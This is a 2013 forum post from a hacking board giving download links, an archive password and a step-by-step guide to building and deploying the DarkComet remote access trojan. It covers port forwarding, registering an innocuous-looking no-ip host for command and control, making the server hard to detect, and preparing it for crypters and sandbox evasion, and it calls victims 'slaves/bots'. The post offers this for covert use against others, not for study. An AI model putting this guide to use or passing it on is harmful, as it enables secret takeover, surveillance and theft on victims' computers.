MPGHB

Members Login

Topic: DarkComet RAT 5.3.1 + Tutorial

Post Info

admin

Senior Member

Status: Offline

Posts: 181

Date: Aug 31, 2013

DarkComet RAT 5.3.1 + Tutorial	Permalink

DarkComet RAT 5.3.1 Tutorial What Is a RAT? A remote access tool (a RAT) is a piece of software that allows a remote "operator" to control a system as if he has physical access to that system. While desktop sharing and remote administration have many legal uses, "RAT" software is usually associated with criminal or malicious activity. Malicious RAT software is typically installed without the victim's knowledge, often as payload of a Trojan horse, and will try to hide its operation from the victim and from security software. The operator controls the RAT through a network connection. Such tools provide an operator the following capabilities; Screen/camera capture or image control File management (download/upload/execute/etc.) Shell control (from command prompt) Computer control (power off/on/log off if remote feature is supported) Registry management (query/add/delete/modify) Other software product-specific functions This tutorial will explain how to set up and use the DarkComet RAT, a remote administration tool. Most remote administration tools require port forwarding because for the packets to reach your computer through the router, the router needs to know which computer on the network to send the packets to; you tell the router to forward any packets sent to specific port to a specific address on the network. We also need to set up a no-ip account and host because almost everyone has a dynamic IP address which means your IP address can change any moment and you will loose all your slaves/bots; no-ip prevents this by telling all bots to resolve your no-ip host which tells the bots what your IP address is. three steps please follow me Let's get started Port-forwarding 1-Navigate to your router's internal IP address using a browser. This is generally 192.168.0.1 but it varies from model to model; I have a NetGear router. You can Google your router's model name and you will most likely find it. 2- Enter your login details. If you don't know them, ask your parents, if they don't know and your router is furnished by your Internet service provider you can try finding the details they gave you; or you can Google your router's model name and "default password" or something alike. It will generally yield results like "admin admin". 3-Click "Services" 4-Click "Add Custom Service". 5-Enter a name such as "Remote Administration" and select "TCP/UDP" and enter 1604 into both port fields. Press Apply. 6-Click "Firewall Rules". 7-Under "Inbound Services", press "Add". 8-Select "Remote Administration" from the drop down menu. Make sure it's set to "ALLOW always" for the Action drop down menu. 9-Open command prompt. Hold the Windows button on your keyboard and press R. Type cmd.exe and hit Enter. 10-In the command prompt window, type ipconfig and hit Enter. 11-Find your main adapter's IPV4 address. In my case it's 192.168.0.5. Enter it into the "Send to LAN Server" field 12-Press apply(done) Setting up no-ip 1-Navigate to no-ip.com in your browser. 2- Click on "Create Account" 3-Click "Sign Up" under Free DNS 4-Enter your details and press "I Accept, Create my Account". 5-You will receive an email with an activation link. Click it to activate your account. 6-Login to your account and you will be in your control panel, press the large "Add a Host" button. 7-Enter a host name in the Hostname field that doesn't look suspicious. I use "someproxy117" for example to make it look like it's just a proxy, even though it's not. Choose any domain they have, it doesn't matter; just make sure you remember it. 8-Don't change anything else, it's good as it. Your IP should be in the IP Address field. 9-Press "Create Host". Darckcomet 5.3.1 Download link: Link 1-SendSpace : http://adf.ly/UuDC5 Link 2-Speedy Share : http://adf.ly/UuD9m Password RaR: mpghb.activeboard.com 2-You'll be presented with a RAR archive, extract it using free 7-Zip or WinRAR. 3-Open the folder you extracted DarkComet to and run DarkCometRAT.exe. 4-Select the "Socket / Net" at the top of the DarkComet window 5-Right click near the top list view and press "Add port to listen" 6-Type in 1604 or whatever port your forwarded. Uncheck "Try to forward automatically (UpNP)"; press "Listen". 7-Close the client settings window and click on the blue drop down menu again in the upper left hand corner and click on server module and then "Full". 8-If you entered a password in the client settings window before, Check "Security Password" and enter the password you entered. Press the "Generate" button several times next to the"Process Mutex" field. This will ensure that your slave won't be able to run the server twice by creating a mutual exclusion. If you plan on using the server in a crypter or distributing it on people who are likely to run it in a sandbox, make sure that "Active FWB" is unchecked. 9-On the left hand side of the window, click on "Network Settings". In the "IP/DNS" field enter your no-ip host name and for the "Port" field enter the port you forwarded; once you've entered the details, click "Add this configuration". 10-Click on "Module Shield" and ensure that the top three check boxes are checked to make the server more difficult to find. 11-Select "Build Module" and click "Build Server". You'll be prompted where to save the file, save it where you can retrieve it later. Congratulations! You just port forwarded, set up no-ip, and downloaded and set up DarkComet and please use any startup in your crypter not in your rat. Hope this tutorial helped, Please rate and comment __________________

Tweet this page

Post to Digg

Post to Del.icio.us

Create your own FREE Forum
Report Abuse